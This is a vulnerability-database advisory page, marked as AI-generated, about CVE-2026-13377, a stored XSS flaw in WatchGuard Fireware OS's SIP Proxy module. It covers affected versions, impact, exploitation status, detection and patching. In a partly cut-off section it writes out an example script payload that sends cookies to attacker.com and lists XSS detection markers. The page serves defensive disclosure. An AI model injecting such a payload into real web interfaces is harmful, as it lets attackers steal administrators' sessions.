
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-13377 is a Stored Cross-Site Scripting (XSS) vulnerability in the SIP Proxy module of WatchGuard Fireware OS, classified under CWE-79. It represents an additional unmitigated attack path related to CVE-2025-6947. Affected versions include Fireware OS 12.0 through 12.12, 12.5 through 12.5.18, and 2025.1 through 2026.2. The vulnerability was published on July 3, 2026, with a patch advisory issued by WatchGuard. It carries a CVSS v3.1 base score of 4.8 (Medium) and a CVSS v4.0 base score of 4.8 (Medium) (GitHub Advisory, WatchGuard Advisory).
The vulnerability (CWE-79) stems from improper neutralization of user-controllable input in the SIP Proxy module before it is rendered in the Fireware OS web management interface. An attacker with high privileges can inject malicious scripts into SIP Proxy configuration fields; these scripts are persistently stored and subsequently executed in the browsers of other users who access the web interface (Stored XSS). Exploitation requires network access, high privileges on the device, and passive user interaction (a victim must view the affected page). This CVE is explicitly described as an additional unmitigated attack path for CVE-2025-6947, suggesting the original fix for that vulnerability did not fully close all injection vectors in the SIP Proxy module (GitHub Advisory, WatchGuard Advisory).
Successful exploitation allows an attacker to inject and persistently store malicious JavaScript in the SIP Proxy module, which executes in the browsers of authenticated users accessing the Fireware web management interface. This can result in session token theft, unauthorized actions performed on behalf of authenticated administrators, or redirection of users to malicious sites. While direct impact on the vulnerable system's confidentiality and availability is rated as none, the subsequent system impact includes low confidentiality and integrity compromise — primarily through browser-side data exposure and unauthorized interface manipulation (GitHub Advisory, WatchGuard Advisory).
As of the time of publication, there is no known public proof-of-concept exploit and no evidence of in-the-wild exploitation (GitHub Advisory). The NVD SSVC assessment confirms exploitation status as "none" and the vulnerability is not automatable. The EPSS score is approximately 0.158% (0.00258), placing it in the 5th percentile for exploitation likelihood within 30 days. No threat actor attribution has been reported, and the CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a SIP Proxy configuration field that is not properly sanitized before storage.<script>, onerror=, javascript:); repeated access to SIP Proxy configuration pages by multiple user accounts in a short timeframe.WatchGuard has released patches addressing this vulnerability; fixed versions are Fireware OS 12.12.1 (for the 12.x branch) and 2026.2.1 (for the 2025.x/2026.x branch). Organizations should upgrade to these patched versions as the primary remediation (WatchGuard Advisory). As interim mitigations, restrict access to the Fireware web management interface to trusted internal networks only, implement Web Application Firewall rules to detect and block XSS payloads in SIP-related traffic, and monitor SIP Proxy configuration fields for unexpected script content. Avoid granting administrative access to untrusted users until patching is complete.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."